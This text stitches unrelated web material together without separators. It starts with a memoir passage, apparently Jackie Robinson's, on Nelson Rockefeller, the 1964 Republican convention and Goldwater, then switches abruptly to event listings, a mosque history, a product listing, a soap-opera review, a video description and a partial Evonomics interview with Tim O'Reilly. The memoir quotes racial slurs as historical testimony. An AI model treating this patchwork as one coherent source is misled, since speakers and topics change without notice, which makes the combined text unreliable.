I knew that Rockefeller's family had given enormous sums to black education and other philanthropic causes for black people and that at that time (nearly twenty years ago) a significant number of black college presidents, black professionals, and a significant number of leaders of national stature had received a college education, financed by Rockefeller gifts. While I have no need to detract from the contributions of the family to black education, I felt it certainly must be weighed in terms of what went into amassing one of the world's greatest fortunes.
As for Nelson Rockefeller himself, I knew little or nothing about his politics. As far as I was concerned, he was just another rich guy with politics as a toy. Our first chat had nothing to do with politics. In fact, the governor took advantage of the occasion to tell me about a private problem. Since I was an officer of the Chock Full O'Nuts Restaurant chain at that time, he thought I might be able to help him. It seemed the Rockefeller family was unhappy about one of our advertising jingles which assured the public that our coffee was as good as any "Rockefeller's money can buy." Representations about the family's feeling in the matter had been made through legal and diplomatic channels, but the offensive jingle was still being aired on radio and television commercials. I promised to mention the matter to Bill Black, Chock's president. I was surprised at Mr. Black's reaction. When I reported the Rockefeller concern, he snapped, "Good! Let them sue. We can use the publicity."
As far as I was concerned, that was the end of that. As far as I knew, I'd probably never be in contact with the governor again. However, I began to change my mind about Rockefeller, when I learned that the extent of his support for a man I admired deeply, Martin Luther King.
When student sit-ins began in the South and many so-called liberals criticized them, Governor Rockefeller told the press that he believed the protesting youngsters were morally justified. I also learned that, unlike Richard Nixon, who failed to speak out about the Georgia jailing of Dr. King, the governor had promptly wired the President asking for his protection.
I also learned of some of the governor's unpublicized actions. Before Rockefeller became governor, the world was stunned by the attempted assassination of Dr. King by a black woman in a Harlem department store. Rushed to Harlem Hospital, Dr. King, who had been wounded by a letter opener plunged into a spot just below the tip of his aorta, immediately was put in the care of a team of crack surgeons headed by Dr. Louis Wright. The newspapers gave intensive publicity to the fact that the then-Governor Harriman had sped to the hospital escorted by police convoy with shrieking sirens. Harriman ordered every available facility utilized to save Dr. King. He then stayed at the hospital for several hours, keeping vigil and awaiting word of the civil right's leader's condition. Governor Harriman deservedly got credit for his concern about a beloved black leader. But it was Nelson Rockefeller who quietly issued orders to have the hospital bill sent to him.
I learned that the governor had made frequent gifts to Dr. King's Southern Christian Leadership Conference. I was on the scene a few hours after hate-crazed bigots burned Georgia churches to the ground. Dr. King asked me top head a national fund-raising drive to restore the churches. Two of the first substantial donations were made by my then-boss Mr. William Black and by Governor Rockefeller. We did rebuild those churches.
Yet with all his goodwill gestures and philanthropies, there was one fact which bothered me deeply about the Rockefeller Administration in 1962. Although New York has, for many years, enjoyed a reputation as a liberal state, the higher echelons of the state government were all white. There were no blacks at top-level, policy making positions. There was not even one black man or woman who had a direct line to the governor and who could alert him to the concerns and grievances of black people. I wondered if Nelson Rockefeller's generosity to black causes was a compartmentalized activity of his private life, and I was sufficiently curious to write him a letter.
My letter to the governor was a harshly honest letter. I said I felt no self-respecting black man could respect an administration that had no blacks in significant jobs. Governor Rockefeller met my honesty head on. He telephoned me personally and told me how much he appreciated my truthfulness. He admitted that things were not as they should be for blacks in state government and that he wanted to take steps to correct this; he suggested we meet and talk things over within the next few days.
In the course of that telephone call, I bluntly said, "If you don't want to hear the down-to-earth truth about how you are thought of in the black community, let's just forget about it."
He assured me that he wanted and needed unbiased advice. The meeting, unadvertised in the press and unreported after it took place, was held in a private room at the top of Radio City Music Hall. About a dozen to fifteen people whom I had invited attended. For some three hours we told the governor our grievances about the failure of his administration to include blacks in the political and government action. The people there didn't hesitate to recite harsh facts. He was aware of some of the facts we gave him; other facts seemed to shock him. He accepted our criticism, our recommendations for change, and he acted to bring about reforms. He did not bring any apologists or token black leaders into the meeting to justify himself. He brought an open mind and someone to take notes.
Within a few months after that meeting, the governor had implemented virtually all the recommendations that the ad hoc committee had made. Out of that one meeting came some sweeping and drastic changes, some unprecedented appointments of blacks to high positions, ensuring influence by blacks in the governor's day-to-day policy decisions. Some of the governor's top-level people were very unhappy about these changes.
In 1964 Governor Rockeller asked me to become one of six deputy national directors of his campaign. I had spent seven years at Chock Full O'Nuts. I decided to resign from my job rather than ask for leave. The knowledge I had acquired about the business world, I considered invaluable. I had been criticized by some of my fellow officers in the company who genuinely felt I took the part of the employees to often, that I was too soft on them. Even so I had been given generous raises and benefits, allowed to purchase a healthy bundle of stock, and been elected to the board. I was becoming restless; I wanted to involve myself in politics as a means of helping black people and I wanted my own business enterprises. I had been increasingly convinced of the need for blacks to become more integrated into the mainstream of the economy. I was not thinking merely of job integration. A statement Malcolm X made was more impressive. Referring to some college students who were fighting to be served in Jim Crow restaurants, Malcolm said he wanted not only the cup of coffee but also the cup and saucer, the counter, the store and the land on which the restaurant stood.
I believed blacks ought to become producers, manufacturers, developers, and creators of businesses, providers of jobs. For too long we had been spending much too much money on liquor while we owned too few liquor stores and were not even manufacturing it. If you found a black man making shoes or candy or ice cream it was a rarity. We talked about not having capital, but we needed to learn to take a chance, to be daring, to pool capital, to organize our buy power so that the millions we spent did not leave our communities to be stacked up in th downtown banks. In addition to the economic security we could build with green power, we could use economic means to reinforce black power. How much more effective our demands for a piece of the action would be if we were negotiating from the strength of our own self-reliance rather than stating our case in the role of a beggar or someone out for charity. We live in a materialistic society in which money doesn't only talk - it screams. I could not forget that some of the very ballplayers who swore the most fervently that they wouldn't play with me because I was black were the first to begin helping me, giving me tips and advice, as soon as they became aware that I could be helpful to them in winning the few thousand more dollars players receive as world champs. The most prejudiced of the club owners were not as upset about the game being contaminated by black players as they were by fearing the integration would hurt them in the pocketbooks. Once they found out that more - not fewer - customers, black and white, were coming through those turnstiles, their prejudices were suppressed.
When Governor Rockefeller invited me on board his campaign ship, I had no idea of any long-term relationship in politics. I saw this as a sign that now was the time for me to enter into a new world of political involvement with a man I respected. At the same time I could be free to pursue some business endeavors that had been proposed to me. I had been approached about becoming a key organizer in a projected, new insurance company, an integrated firm that, I hoped, could be a force in correcting some of the unjust practices of some insurance firms that treat blacks unfairly. At this time the group organizing a new bank in Harlem - Freedom National - had asked me to help put it together and to become chairman of the board, and there were other business ventures in which I felt I might be able to play a vital role. When I submitted my resignation to Bill Black, he understood my aspirations. He didn't want me to leave, and he was genuinely concerned as to whether I was making the wisest move. He tried to persuade me to stay. I appreciated his attitude, but my mind was made up. I joined the Rockefeller headquarters.
One of the first things that became clear to me was that I had not been called on to be the black adviser to the campaign. Often white politicians secure the services of a black man and slot him only for appearances and activities within the black community. Sometimes they do this to avoid letting whites know that they are making a strong pitch for black support. During the Rockefeller campaign I met with groups and made appearances before audiences which were sometimes predominately black, and other times mainly white. On several occasions, when the governor came into town for a meeting with politicians or community people, I would accompany him. At some of the larger meetings, I would be asked to introduce the governor.
I was not as sold on the Republican party as I was on the governor. Every chance I got, while I was campaigning, I said plainly what I thought of the right-wing Republicans and the harm they were doing. I felt the GOP was a minority party in term of numbers of registered voters and could not win unless they updated their social philosophy and sponsored candidates and principles to attract the young, the black, and the independent voter. I said this often from public, and frequently Republican, platforms. By and large Republicans had ignored blacks and sometimes handpicked a few servile leaders in the black community to be their token "niggers". How would I sound trying to go all out to sell Republicans to black people? They're not buying. They know better.
I admit freely that I think, live, and breathe black first and foremost. That is one of the reasons I was so committed to the governor and so opposed to Senator Barry Goldwater. Early in 1964 I wrote a Speaking Out piece for The Saturday Evening Post. A Barry Goldwater victory would insure that the GOP would be completely the white man's party. What happened at San Francisco when Senator Goldwater became the Republican standard-bearer confirmed my prediction.
I wasn’t altogether caught of guard by the victory of the reactionary forces in the Republican party, but I was appalled by the tactics they used to stifle their liberal opposition. I was a special delegate to the convention through an arrangement made by the Rockefeller office. That convention was one of the most unforgettable and frightening experiences of my life. The hatred I saw was unique to me because it was hatred directed against a white man. It embodied a revulsion for all he stood for, including his enlightened attitude toward black people.
A new breed of Republicans had taken over the GOP. As I watched this steamroller operation in San Francisco, I had a better understanding of how it must have felt to be a Jew in Hitler’s Germany.
The same belief in the superiority of one religious or racial group over another was here. Liberals who fought so hard and so vainly were afraid not only of what would happen to the GOP but of what would happen to America. The Goldwaterites were afraid – afraid not to hew strictly to the line they had been spoon-fed, afraid to listen to logic and reason if it was not in their script.
I will never forget the fantastic scene of Governor Rockefeller’s ordeal as he endured what must have been three minutes of hysterical abuse and booing which interrupted his fighting statement which the convention managers had managed to delay until the wee hours of the morning. Since the telecast was coming from the West Coast, that meant that many people in other sections of the country, because of the time differential, would be in their beds. I don’t think he has ever stood taller than that night when he refused to be silenced until he had had his say.
It was a terrible hour for the relatively few black delegates who were present. Distinguished in their communities, identified with the cause of Republicanism, an extremely unpopular cause among blacks, they had been served notice that the party they had fought for considered them just another bunch of “niggers”. They had no real standing in the convention, no clout. They were unimportant and ignored. One bigot from one of the Deep South states actually threw acid on a black delegate’s suit jacket and burned it. Another one, from the Alabama delegation where I was standing at the time of the Rockefeller speech, turned on me menacingly while I was shouting “C’mon Rocky” as the governor stood his ground. He started up in his seat as if to come after me. His wife grabbed his arm and pulled him back.
I had been very active on that convention floor. I was one of those trying to help bring about a united front among the black delegates in the hope of thwarting the Goldwater drive. George Parker had courageously challenged Goldwater in vain and Edward Brooke had lent his uncompromising sincerity to the convention. I sat in with them after the nomination as they agonized about what they should do. Some were for walking out of the convention and even out of the party. Others felt that, as gloomy as things looked, the wisest idea was to remain within the party and fight. Throughout the convention, I had been interviewed several times on network television. When I was asked my opinion of Barry Goldwater, I gave it. I said I thought he was a bigot. I added that he was not as important as the forces behind him. I was genuinely concerned, for instance, about Republican National Committee Chairman William Miller, slated to become the Vice Presidential candidate. Bill Miller could have become the Agnew of his day if he had been elected. He was a man who apparently believed you never said a decent thing in political campaigning if you could think of a way to be nasty, insinuating, and abrasive. What with the columns I had written about Goldwater, The Saturday Evening Post article, and the television and radio interview, I had achieved a great deal of publicity about the way I felt about Goldwater.
Although I know it is the way of politicians to forget their differences and unify around the victor, it disgusted me to see how quickly the various anti-Goldwater GOP kingpins got converted. Richard Nixon, who hadn’t really fought Goldwater and had in fact been an ally, naturally became one of his most staunch supporters. You could expect that. Governor Romney, who had fought the Goldwater concept so vigorously, got religion. The convert who around the most cynical feelings in my mind was Governor William Scranton. When Governor Rockefeller had withdrawn from the race, during the primaries, Rockefeller supporters turned to Scranton because he had become the governor’s choice. At the request of the governor I had a meeting with Scranton in his beautiful home in Pennsylvania.
Governor Scranton welcomed me graciously, introduced me to his family, and conducted me to a veranda where we sat and sipped iced tea. The governor pledged that he was going to put up a terrific fight against Goldwater. He expressed his gratitude for Governor Rockefeller’s support and for my agreeing to come to see him. For at least ten minutes he orated about Barry Goldwater, what a threat Goldwaterism is to the country and the party. I didn’t ask him for it, but he gave his solemn oath that even if Goldwater won the nomination, he, Bill Scranton, could never conceivably, under any circumstances, support him. Even if he wanted to, which he said he didn’t, it would be political suicide in his state for him to join a Goldwater bandwagon. He was unequivocal about this, and months later, when I saw on television how quickly Governor Scranton pledged his loyalty to nominee Goldwater, how eagerly he engaged in some of the most revolting high-level white Uncle Tomism I’ve ever seen – fawning on Goldwater and vigorously campaigning for him around the country – I had to wonder if this was, indeed, the same man who had nearly sworn on the Bible that he could never do what he was doing.
In marked contrast to the Scranton flip-flop, there were some Republicans who proved themselves true to their principles, party loyalty not withstanding. Senator Jacob Jarvits stated flatly that he could not support Goldwater; Senator Hugh Scott of Pennsylvania, who had sounded off early about the Goldwater threat, announced that he would be running his own campaign in that same states where Bill Scranton had had a change of heart. Scott, whom I had admired for years because of his liberal words and legislation, took his chance of letting it be known he was snubbing the head of his party’s national ticket. As for Governor Rockefeller, while he did not publicly reject Goldwater, it was no secret that he didn’t break his back to try to help elect him. No doubt, the Senator and his campaign manager, Bill Miller, had things more comfortable for the governor symbolically to go fishing by not going down on their hands and knees to beg for his participation. There was a great business of calling unity meetings of all prominent Republicans. Unity, it appeared, meant to Goldwater and Miller, “Let’s cooperate. You do it my way.”
Apparently, I was one of the preconvention opposition who Senator Goldwater thought he could unify into his campaign. Although I had let it be widely known that I intended to do all I could for LBJ, Candidate Goldwater sent me an invitation early; in August to come to Washington to have breakfast with him. He suggested that I really didn’t know him well enough to condemn him and that he felt we might be able to learn something from each other.
Some people will say I should have accepted the invitation. I did not reject it in hasty anger. My instinct simply told me immediately that the only way the Senator could sell me his candidacy was if he repudiated the John Birchers, the dirty campaign tactics of Bill Miller who was his running mate, and some of the basic standards he and his crowd had set. I knew he wasn’t about to do all that simply to get my support.
I resolved that I should not allow myself to get boxed into the image of being a hothead, unwilling, for no good reason, to talk things over. Consequently, I released the text of my reply to the Goldwater invitation to the press. In that letter I told the Senator I was releasing my reply to the national press. The letter said in part:
“You say to me that you are interested in breaking bread with me and discussing your views on civil rights. Senator, on pain of appearing facetious, I must relate to you a rather well-known story regarding the noted musician, Louis Armstrong, who was once asked to explain jazz. “If you have to ask,” Mr. Armstrong replied, “you wouldn’t understand.”
What are you going to tell me, Senator Goldwater, which you cannot or do not choose to tell the country – or which you could not have told the convention which you controlled so rigidly that it booed Nelson Rockefeller, a distinguished fellow-Republican?
What are you going to say about extremism now? You called for it and the answer came in the thudding feet and the crashing store windows and the Molotov cocktails and the crack of police bullets and the clubbing of heads and the hate and the violence and the fear which electrified Harlem and Rochester and Jersey. I am solidly committed to the peaceful, non-violent mass action of the Negro people in pursuit of long-overdue justice. But I am as much opposed to the extremism of Negro rioters and Negro hoodlums as I am to the sheeted Klan, to the sinister Birchers and to the insidious citizens’ Councils.
If, in view of these questions, which I raise in absolute sincerity and conviction, you still think a meeting between us would be fruitful, I am available at your convenience.”
My letter to the Senator did not receive any response from him. It did get a response from many people who read it in the newspapers. The fan mail ran about half and half, with some people giving me a hard time for not accepting Senator Goldwater’s invitation and other declaring that I told him off.
I joined the national headquarters of Republicans for Johnson, based in New York, and accepted speaking assignments wherever I could to tell black and white and mixed audiences how deeply I felt that Goldwater must be overwhelmingly repudiated. It was during the Johnson-Goldwater campaign that I had one of my confrontations with the articulate, eyebrow-raising William Buckley, owner of National Review magazine and star of the controversial Firing Line television show.
I was booked on a television Conservatism panel which included Bill Buckley, Shelley Winters, and myself. When my friends and family learned I had consented to participate, they were aghast.
“Send a telegram and say you can’t make it”, one friend told me. “Bill Buckley will destroy you. He really knows how to make people look foolish.”
I was glad to receive these warnings. I didn’t have the slightest intention of backing out, although I already had a healthy respect for Buckley’s craft as debater. These apprehensions of my friends made me create an advance strategy which I otherwise might have not employed. I lifted it strictly out of my sports background. When you know that you are going to face a tough, tricky opponent, you don’t let him get the first lick. Jump him before he can do anything and stay on him, keeping him on the defensive. Never let up and you rattle him effectively. When the show opened up – before Buckley could get into his devastating act of using snide remarks, big words, and the superior manner – I lit right into whim with the charge that many influential Goldwaterites were racists. Shelley Winters piled in behind me, and Buckley scarcely got a chance to collect his considerable wit. A man who prides himself on coming out of verbal battle cool, smiling, and victorious, he lost his calm, became snappish and irritated, and, when the show was over and everyone else was shaking hands, got up and strode angrily out of the studio.
It was a small victory, but an important one for me. There didn’t seem to be much to win in those days on the political scene but I have always believed in fighting, even if only to keep the negative forces back. That is why I had some measure of satisfaction in helping Johnson win in ’64.
We are in the process of converting from an environmental and sustainability speakers bureau to an online speakers directory (with the same green focus). The EcoSpeakers.com website is large and complicated, and it will take well into 2018 to fully roll out this shift.
Our speakers have written hundreds of books, including many that have become classics in their fields. Browse the EcoSpeakers Bookstore.
If you would like to help us succeed by linking to EcoSpeakers.com, click here for details and linking images.
UC Berkeley Events Calendar: Anthropology from Portugal, on Portugal and beyond Portugal: racialized relations and representations
Anthropology from Portugal, on Portugal and beyond Portugal: racialized relations and representations
Paula Mota Santos will speak about "Slavery as dark heritage in Post-colonial Portugal". The Lagos, Southern Portugal slavery exhibition is only the second European-located museum space dedicated to the transatlantic slave trade, and one institutionally linked to UNESCOs Slave Route program. I will carry out an analysis of the images, texts and forms of display of the Lagos exhibition will be presented and cross-referenced to the way slavery is displayed in the NMAAHC in Washington DC. The recently approved project of a slavery memorial in Lisbon as well as the fate of the remains of 15th century slaves found in Lagos will also be discussed.
Paula Mota Santos (UCL, UK 2004) is an anthropologist who focus her research interests in the relation between social identity and space. She as published on heritage, tourism, migration and urban horticultural communities. She has an interest in visual representation and has published on film, photography and on theme parks whose theme is the nation.
Cristiana Bastos will speak about "Portuguese in the cane: the racialization of labor in Hawaiian plantations". Based on her current project The Colour of Labour, she will discuss the relationship between the roles in the production system and the production of racialized social categories. She will refer to Hawaiian plantations labor and analyse the category Portuguese.
Cristiana Bastos (CUNY 1996) is an anthropologist with cross disciplinary incursions into history, history of science, public health and the intersections of migration and colonialism. She is currently leading the multi-track project The Colour of Labour  the racialized lives of migrants, funded by the European Research Council, with empirical research in plantation and plantation-like societies. She is based at the Institute of Social Sciences, University of Lisbon, where she heads the Research Group Identities, Cultures, Vulnerabilities and participated in a variety of programs and projects in Portugal, Brazil, USA, UK, India, Mozambique, Germany, Spain and Italy.
On March 30th 1979 the foundation for the Mosque for first mosque in New Zealand was laid. Further extensions was completed in 1986, which created a praying area for ladies, accommodation for the Imam, kitchen facilities, Janaza washing room and additional prayer hall for Jumma prayers.
Ponsonby Mosque was re-named to Al-Masjid Al-Jamie to give the mosque a Islamic name in the late 20th century. Today the Al-Masjid Al-Jamie has a total capacity of 700 people with a capacity of 20 car parks and additional parking in the church on the opposite side of the street for Friday Jummah prayers.
Thank you for your contribution. Your message has been sent privately to our editorial staff for review.
Disclosure : Everyday Carry is a participant in the Amazon Services LLC Associates Program, an affiliate advertising program designed to provide a means for sites to earn advertising fees by advertising and linking to Amazon.com
We’re glad you dig this post! But first, please take a few moments to sign up as a member of our EDC community below.
I’ve been playing around with SSD drives in raid configuration for almost 2 years now and would like to share my experience that will hopefully save somebody some time and money.
All RAID configurations described here were based on Intel RAID controller built-in to P55-based motherboards.
Home / Kindness in Action / Class Action: Kindness through Service-Learning / Class Action Examples / Hardisty School, Edmonton
Students studying democracy and citizenship in their grade 6 social studies class decided they wanted to exercise good citizenship and do something to give back to the community.
I had the opportunity to interview two students from Mr. Wyse and Ms. Alfazema’s class and asked them about their project.
“Our class brainstormed [fundraising] activities –most of the girls wanted a bake sale and since there are more girls in our class that’s what we did.” (The boys had been pushing for a paint balling, but had been outvoted.) Also through democratic process, students voted to donate the proceeds of the bake sale to help animals around the province.
“Everyone got a job. This helped make the fundraiser go better.” Some of the student tasks included set up, take down, advertizing and poster creation, and cashiers to work during the two lunch hours the bake sale took place.
I asked the students how doing this project made them feel. “It was good to know that we helped an animal” said one student. “Happy! It was successful!” exclaimed the other. “We weren’t sure how it would turn out, but the bake sale sold out and we raised a lot of money to help animals.”
【The Best Match】:The flat side,one style,on the basis of retaining the big holes,The distance between the holes is closer,giving you a more compact hairstyle;another style,There are 32 more dense holes. The otherside has big waves and holes,dual using design gives you five options on how to twist your natural hair
【Perfect Palm Size】:Fit the hand,grip comfortably,easy to use and curls appear in no time at all to get a barber’s professional look all by yourself.
【More Durable】:Reusable,Portable,suitable for home travel use,perfect for any fashion people,is a great gift for your family members.
ENH is a small family organization comprised of individuals who are dedicated to promoting the God-given gift of Nature. Our focus is on natural hair and everything that encompasses natural hair –hence, the name, EverythingNaturalHair. We thrive off of our members’ needs and desires and have created ENH as a vehicle to connect women with natural hair with other women to to share their experiences. Our goal is to reach out to a community of women who are willing to share, learn, and embrace the inner and outer beauty of what it truly means to be natural. To join us in this evolving natural hair movement, visit our website at www.everythingnaturalhair.com or follow us on Twitter, Facebook, Pinterest, and Instagram.
Ironically, it was through one of Passions hokier gimmicks – the green mist – that viewers were treated to one of the show's most realistic romances: the odd pairing of Julian and Eve.
Both characters have been separately embroiled in more than their fair share of satirical and farcical machinations, so it was a pleasant surprise to see their union portrayed with down-to-earth sincerity, quiet tenderness and subtle affection. In this mist-induced vision of what would have happened had they made different choices in their lives, Julian was disinherited by Alistair for standing up to his father's disapproval of his interracial relationship with Eve. For her part, Eve followed through on her musical aspirations and parlayed her nightclub act into Whitney Houstonesque fame and fortune.
Through this exercise in what-ifs, viewers got a glimpse of a kinder, gentler Julian, a self-actualized Eve, and a really sweet relationship. Ben Masters and Tracey Ross are to be commended for so believably revealing new facets of their characters, and for fashioning a compelling backstory for Julian and Eve – one that might even entice fans to root for this unlikely couple.
NOTE: I'm not blindly hating on the person that uploaded this file to the workshop. I'm simply pointing out that it's a horrible idea to upload video files to a place where you're supposed to share content that can be used in Source Filmmaker. Be sure to hit the like button! Also, don't forget to subscribe to my channel for more content! ________________________________________ Patreon: https://www.patreon.com/user?u=3272799&ty=h Twitter: https://twitter.com/BearAnima Twitch: https://www.twitch.tv/sir_freddy_fazbear Steam Group: http://steamcommunity.com/groups/BAfa... ________________________________________ Songs used: Elevator Music Carmina Burana - O Fortuna
Bruh stop hating on animations in the workshop! it's actually helpful to see how he/she did there animation, it gives you a tip of another way to make a animation.
I read this article and found it very interesting, thought it might be something for you. The article is called Evolving the New Economy: Tim O’Reilly and David Sloan Wilson and is located at http://evonomics.com/new-economy-evolution-oreilly-wilson/.
I use the phrase “Evolving the Future” a lot nowadays. It’s the title of a major scientific review article (“Evolving the Future: Toward a Science of Intentional Change”) and part of the subtitle of my next book (“This View of Life: Completing the Darwinian Revolution and Evolving the Future”), which will be published by Pantheon Press in 2019. For me, the phrase represents the maturation of evolutionary theory to the point where it can be used to improve the quality of life at all scales, from individuals to the planet.
I recently discovered a soul mate in Tim O’Reilly, whose cleverly titled WTF? What’s the Future and Why It’s Up to Us covers the same ground from a very different starting point. O’Reilly is one of the pioneers of the Internet, whose publishing business began with technical computer manuals and expanded into O’Reilly Media, which serves as a catalyst for evolving the future of the Information Age. As a polymath trained in the Classics, O’Reilly has absorbed some of my world of evolutionary science–especially genetic algorithms and their fitness functions-–but uses key words such as “evolution” and “adapt” in the vernacular for the most part. Nevertheless, his vision of what we must do to ensure a bright future is strikingly convergent with mine and there is uncanny overlap in the people and examples that we draw upon to make our respective arguments.
I have Evonomics.com to thank for bringing O’Reilly to my attention. He wrote a complimentary tweet about my conversation with the economist Robert Frank, prompting Editor-in-Chief Robert Kadar to make a connection. Although Tim has already written for Evonomics.com, it is only fitting that we have our own conversation to explore the merging of our two worlds.
As you probably know, evolutionary theory developed more or less continuously since Darwin in the biological sciences but experienced a case of arrested development in relation to human affairs. Only during the 1980’s did terms such as “evolutionary psychology” and “evolutionary economics” begin to be coined, signaling an attempt to rethink whole disciplines from a modern evolutionary perspective. This is why the Darwinian revolution is not yet complete and why a person such as yourself, despite being intellectually voracious, might have encountered evolutionary theory only here and there in your own intellectual odyssey. I would therefore like to begin by asking how much formal evolutionary thinking you feel that you have already absorbed—in other words, the use of key words such as “evolve” and “adapt” in ways that are not just colloquial.
TO’R: I never had any formal scientific training in evolutionary biology beyond my high school AP biology class, but as a scientifically literate layman, I have read many books on the subject over the years, and it has been part of the texture of my scientific understanding. In addition, I co-organized a conference on bioinformatics with Nature Publishing Group from 2001 to 2003, and I’ve been running a science unconference called Science Foo Camp with Nature and Google every year since 2004.
More specifically, the idea of the evolution of human consciousness was something that was very much in the air in California when I was growing up. My friend George Simon, with whom I led workshops at Esalen in the summer of 1973 shortly before his untimely death, had started a group called The Community for Conscious Evolution, which posited the evolution of human consciousness from today’s individual mind towards a kind of global superconsciousness. Deeply influenced by thinkers like Sri Aurobindo and Teilhard de Chardin, he envisioned it through a spiritual lens; little did we know then that the idea would come back around 30 years later, but this time seen as the result of the internet. “Collective intelligence” was a central part of my 2004 framing of Web 2.0 and the internet as a platform for “the global brain.”
In choosing to study Greek and Roman classics at Harvard, I was influenced by books such as Bruno Snell’s Discovery of the Mind, which focused on apparent changes to the way that humans understood themselves and where thoughts came from from the time of Homer to the period only a few centuries later when Socrates and Plato were articulating ideas that have been the foundation of our abstract thought ever since. I wrote my honors thesis in 1975 explaining that mystical passages in Plato were not the result of “Orphic influence,” but rather an expression of the numinous power that new ideas have. So much of what we think is rehearsed knowledge. When we think things for the first time, they change who we are, evolving us as individuals and ultimately as a species, and they have enormous power as a result.
Ideas of evolution and ecology were also part of the backdrop of Frank Herbert’s Dune Trilogy, about which I wrote my first book in 1978. If you can find a used copy of that book on Amazon or alibris, or for that matter, where I have put it up as a PDF on my website, you will find a lot more material for this Q & A.
Speaking of Herbert, I wrote: “One of his central ideas is that human consciousness exists on—and by virtue of—a dangerous edge of crisis, and that the most essential human strength is the ability to dance on that edge. The more man confronts the dangers of the unknown, the more conscious he becomes. All of Herbert’s books portray and test the human ability to consciously adapt.”
“It is a general principle of ecology that an ecosystem is stable not because it is secure and protected, but because it contains such diversity that some of its many types of organisms are bound to survive despite drastic changes in the environment or other adverse conditions. Herbert adds, however, that the effort of civilization to create and maintain security for its individual members, “necessarily creates the conditions of crisis because it fails to deal with change.”
I had never thought that much about economics in evolutionary terms, but as I wrote my book WTF? What’s the Future and Why It’s Up to Us, it occurred to me that the idea of fitness landscapes bridged well to the idea of fitness functions or objective functions in AI, which is why I used it in the early part of my book.
As you know, I also used Lynn Margulis’ idea of symbiogenesis in my thinking about future AI. I was familiar with her ideas but I was not actually familiar with the term itself when I wrote the book. I only learned about it after the book was published, via a talk at Stewart Brand’s Long Now Foundation. That’s why the term itself never appears in the book.
I mostly use these ideas as analogy, metaphor, how to trigger the spark of recognition, but I can also see that they may be the basis for a true scientific theory of economics.
DSW: Indeed they can! I don’t want to make it sound hierarchical, however, as if the evolutionary scientists are bringing wisdom to the unlearned masses. Evolutionary biologists have largely confined their attention to the study of genetic evolution, so a broader view of evolution that includes such things as cultural evolution, economics from an evolutionary perspective, and even the invention of new inheritance systems stretches their own boundaries. Your book is way ahead of the curve for many of my more doctrinaire colleagues. For the rest of this interview, I want to highlight how a broad view of evolution supports some of the major conclusions that you reach in WTF?. Let’s begin with the all-important need to employ the right perspective. Here is a passage from my forthcoming book:
To begin, we need to do a bit of clear thinking on what science is. It is commonly portrayed as a contest between theories that is based on a common stock of observations. First we see and then we theorize. Theories that do the best job of explaining the observations are accepted, only to be challenged by another round of theories, and so on, bringing our knowledge of the world closer to reality.
The problem with this view of science is that the common stock of observations is nearly infinite. We cannot possibly attend to everything so a theory—broadly defined as a way of interpreting the world around us—is required to tell us what to pay attention to and what to ignore. We must theorize to see. A new theory doesn’t just posit a new interpretation of old observations. It opens doors to new observations to which the old theories were blind.
I could have used words such as “perspective”, “worldview”, and “narrative” in place of “theory”. You use the word “map” to make the same point. Please elaborate on your concept of using the right maps.
TO’R: You’re absolutely right. We are all operating from a map of the world, which was built up from raw sensations during early childhood, but as we grow older, it is mostly handed down to us by others. A small child is naturally a scientist – I remember my grandson dropping peas from his high chair, watching them carefully as they dropped, repeating the experiment until he was satisfied that the behavior was consistent. Too often, children’s natural explorations are cut short, and their ability to learn from experience is cut short with them.
Some people have the retained the gift of looking at the world straight on, and forming a new map. I’m not sure I agree with you, though, that we must already have a new theory to see the world anew. In my own experience, it’s when we let go of theory, realize that the universe is infinite, our experience of it a limited abstraction from all that we might experience, and our labels or language or maps that describe it yet another level of abstraction, that we can begin to open our minds and see the world freshly. In Zen Buddhism, they call this “beginner’s mind.” It’s easy to think that this is just an attitude; it’s not. It’s a way of opening yourself to the direct experience, free of the maps that blind us to seeing it for the first time, like a baby does, and letting the world itself teach you.
George Simon taught this as an experiential practice. I learned to empty my mind and let things in without naming them. Then, in a kind of spiritual digestion, the things you “let in” start to turn into experiences and then give birth to fresh perspectives and ideas. University of Chicago psychologist Eugene Gendlin described this same process with the phrase “surrender and catch.”
Re-envisioning the world definitely involves drawing a new map, though. Old maps get out of date, and we have to see the world afresh to keep up with the new possibilities. Scientists redraw the map, but so do poets and artists and politicians and entrepreneurs.
I also use the analogy of doing a jigsaw puzzle where all the pieces may not yet be on the table, and where there is no finished image to work from. Most of us aren’t able to envision a new world out of whole cloth, which is why innovation is often stepwise, with one entrepreneur building on the insights of another. In my book, I describe the complex (unfinished) dance by which the ride sharing market as we know it today evolved. The original vision for Uber was for a black car service. It was Sunil Paul who envisioned peer-to-peer car sharing with his startup Sidecar; that idea was popularized by Lyft, and then made its way back to Uber. But Sunil had had much earlier ideas (many of them) about how GPS could transform the transportation market, but there just weren’t enough GPS-enabled smartphones around in 2001 when he wrote his original patents for his ideas to take hold.
DSW: Against this background, we can compare two master theories (=perspectives, worldviews, narratives, maps). The first asserts that the pursuit of lower-level self-interest robustly benefits the common good. This is the basic concept of laissez-faire that has been central to economics from the beginning. It is captured by Mandeville’s “The Fable of the Bees”, by Adam Smith’s metaphor of the invisible hand, by the novels and essays of Ayn Rand, by the “Greed is Good” meme from the movie Wall Street, and by the mathematical edifice of neoclassical economics and its lofty sounding “First Fundamental Theorem of Welfare Economics”. The second is Multilevel Selection (MLS) Theory from evolutionary biology, which shows how adaptations can evolve—or fail to evolve—at any level of a multi-tier hierarchy, such as from genes to ecosystems in biological systems or from small groups to global-governance in human social systems. The general rule of MLS theory is “adaptation at any given level requires a process of selection at that level and tends to be undermined by selection at lower levels (go here for more: 1,2,3). In human terms, what’s good for me can be bad for my family; what’s good for my family can be bad for my clan; all the way up to what’s good for my nation or corporation can be bad for the global village. This is profoundly antithetical to the invisible hand metaphor as commonly understood, although it leads to a new and more legitimate conception of the invisible hand, as we will see later in this interview. In any case, you also reach the conclusion that narrow profit maximization or even a somewhat more enlightened objective of “customer delight” (as Amazon’s CEO Jeff Bezos puts it on p. 366 of your book) isn’t good enough and becomes part of the problem. You even use the evolutionary phrase “flawed fitness functions” (p 197). Please elaborate on these points from your own perspective.
TO’R: Here we are definitely thinking in parallel using different bodies of knowledge as the maps we are working from and trying to make more accurate. You are using evolutionary theory; I am using AI and the management of algorithms.
When Google, Facebook, Amazon, or Uber build a marketplace, they are effectively building an algorithmic system for management of their marketplace. My contention in my book is that if they model the world incorrectly, the system they build will fail. I argue, for example, that if Uber is building a two-sided marketplace that requires both passengers and drivers, rewarding passengers with low fares while treating drivers as an inexhaustible resource to be exploited with low wages is not sustainable. The master algorithm of growing company valuation leads them to strategies that increase their value in the short run but cost them more in the long run.
